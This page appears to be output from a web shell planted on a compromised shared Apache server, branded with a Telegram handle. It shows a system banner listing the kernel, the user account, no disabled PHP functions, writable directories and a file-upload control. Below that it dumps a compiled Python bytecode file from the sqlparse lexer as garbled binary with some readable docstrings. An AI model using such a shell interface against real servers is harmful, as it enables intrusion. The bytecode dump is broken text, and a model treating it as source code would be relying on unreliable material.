https://t.me/RX1948
Server : Apache
System : Linux iad1-shared-b8-43 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User : dh_edsupp ( 6597262)
PHP Version : 8.2.26
Disable Function : NONE
Directory :  /lib/python3/dist-packages/sqlparse/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/python3/dist-packages/sqlparse/__pycache__/lexer.cpython-310.pyc
o

�e}_�	�@sPdZddlmZddlmZddlmZddlmZGdd�d�Z	dd	d
�Z
dS)z	SQL Lexer�)�
TextIOBase)�tokens)�	SQL_REGEX)�consumec@seZdZdZeddd��ZdS)�Lexerz?Lexer
    Empty class. Leaving for backwards-compatibility
    Nccs�t|t�r
|��}t|t�rn,t|t�r3|r|�|�}nz|�d�}Wnty2|�d�}Yn
wtd�t	|����t
|�}|D]>\}}tD]1\}}|||�}|sTqHt|tj
�rb||��fVnt|�rm||���Vt||��|d�ntj|fVqBdS)a�
        Return an iterable of (tokentype, value) pairs generated from
        `text`. If `unfiltered` is set to `True`, the filtering mechanism
        is bypassed even if filters are defined.

        Also preprocess the text, i.e. expand tabs and strip it if
        wanted and applies registered filters.

        Split ``text`` into (tokentype, text) pairs.

        ``stack`` is the initial stack (default: ``['root']``)
        zutf-8zunicode-escapez+Expected text or file-like object, got {!r}�N)�
isinstancer�read�str�bytes�decode�UnicodeDecodeError�	TypeError�format�type�	enumeraterr�
_TokenType�group�callabler�end�Error)�text�encoding�iterable�pos�char�rexmatch�action�m�r�0/usr/lib/python3/dist-packages/sqlparse/lexer.py�
get_tokenss>�


�
�
��zLexer.get_tokens�N)�__name__�
__module__�__qualname__�__doc__�staticmethodr!rrrr rsrNcCst��||�S)z�Tokenize sql.

    Tokenize *sql* using the :class:`Lexer` and return a 2-tuple stream
    of ``(token type, value)`` items.
    )rr!)�sqlrrrr �tokenizeLsr)r")r&�ior�sqlparser�sqlparse.keywordsr�sqlparse.utilsrrr)rrrr �<module>s6

https://t.me/RX1948 - 2025